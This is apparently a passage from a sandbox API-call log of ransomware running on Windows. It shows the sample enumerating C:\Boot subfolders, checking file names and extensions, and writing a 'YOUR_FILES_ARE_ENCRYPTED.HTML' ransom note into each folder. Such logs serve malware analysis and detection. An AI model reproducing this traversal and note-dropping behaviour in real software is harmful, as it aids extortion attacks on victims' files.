[0104.533] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.533] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.533] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.533] GetProcessHeap () returned 0x600000 [0104.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.533] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fi-fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.537] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.538] CloseHandle (hObject=0x300) returned 1 [0104.538] GetProcessHeap () returned 0x600000 [0104.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.538] GetProcessHeap () returned 0x600000 [0104.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.539] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="Fonts", cAlternateFileName="")) returned 1 [0104.539] StrStrIW (lpFirst="Fonts", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.539] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0104.539] GetProcessHeap () returned 0x600000 [0104.539] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.540] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\Fonts" | out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0104.540] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*") returned="\\\\?\\C:\\Boot\\Fonts\\*" [0104.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.542] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.542] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0104.542] StrStrIW (lpFirst="chs_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.542] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0104.542] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0104.542] lstrlenW (lpString=".ttf") returned 4 [0104.542] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0104.542] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0104.542] StrStrIW (lpFirst="cht_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.542] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0104.542] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0104.542] lstrlenW (lpString=".ttf") returned 4 [0104.542] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0104.542] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0104.542] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.542] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0104.542] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0104.542] lstrlenW (lpString=".ttf") returned 4 [0104.542] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0104.542] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78adba97, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78adba97, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0104.542] StrStrIW (lpFirst="kor_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.542] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0104.542] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28784, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="malgunn_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 34 [0104.543] PathFindExtensionW (pszPath="malgunn_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="malgunn_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29114, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="malgun_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf") returned 33 [0104.543] PathFindExtensionW (pszPath="malgun_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="malgun_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20718, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="meiryon_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 34 [0104.543] PathFindExtensionW (pszPath="meiryon_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="meiryon_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20d6c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="meiryo_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 33 [0104.543] PathFindExtensionW (pszPath="meiryo_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="meiryo_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2553c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="msjhn_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 32 [0104.543] PathFindExtensionW (pszPath="msjhn_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="msjhn_boot.ttf") returned=".ttf" [0104.543] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211ecd4c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25d10, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0104.543] StrStrIW (lpFirst="msjh_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.543] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf") returned 31 [0104.543] PathFindExtensionW (pszPath="msjh_boot.ttf") returned=".ttf" [0104.543] lstrlenW (lpString=".ttf") returned 4 [0104.543] PathFindExtensionW (pszPath="msjh_boot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x22b2c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="msyhn_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 32 [0104.544] PathFindExtensionW (pszPath="msyhn_boot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="msyhn_boot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b01e78, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b01e78, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x23b34, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="msyh_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf") returned 31 [0104.544] PathFindExtensionW (pszPath="msyh_boot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="msyh_boot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8cb4, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="segmono_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf") returned 34 [0104.544] PathFindExtensionW (pszPath="segmono_boot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="segmono_boot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d20, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="segoen_slboot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 35 [0104.544] PathFindExtensionW (pszPath="segoen_slboot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="segoen_slboot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae62bb5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12e5c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="segoe_slboot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 34 [0104.544] PathFindExtensionW (pszPath="segoe_slboot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="segoe_slboot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0104.544] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.544] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0104.544] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0104.544] lstrlenW (lpString=".ttf") returned 4 [0104.544] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0104.544] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x1ae3c95a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0104.544] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0104.545] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.545] GetProcessHeap () returned 0x600000 [0104.545] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.545] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fonts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.546] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.547] CloseHandle (hObject=0x300) returned 1 [0104.547] GetProcessHeap () returned 0x600000 [0104.547] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.547] GetProcessHeap () returned 0x600000 [0104.547] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.548] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0104.548] StrStrIW (lpFirst="fr-CA", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.548] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA") returned 17 [0104.548] GetProcessHeap () returned 0x600000 [0104.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.549] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\fr-CA" | out: lpString1="\\\\?\\C:\\Boot\\fr-CA") returned="\\\\?\\C:\\Boot\\fr-CA" [0104.549] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-CA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fr-CA\\*") returned="\\\\?\\C:\\Boot\\fr-CA\\*" [0104.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-CA\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.549] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.549] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.549] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.549] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: 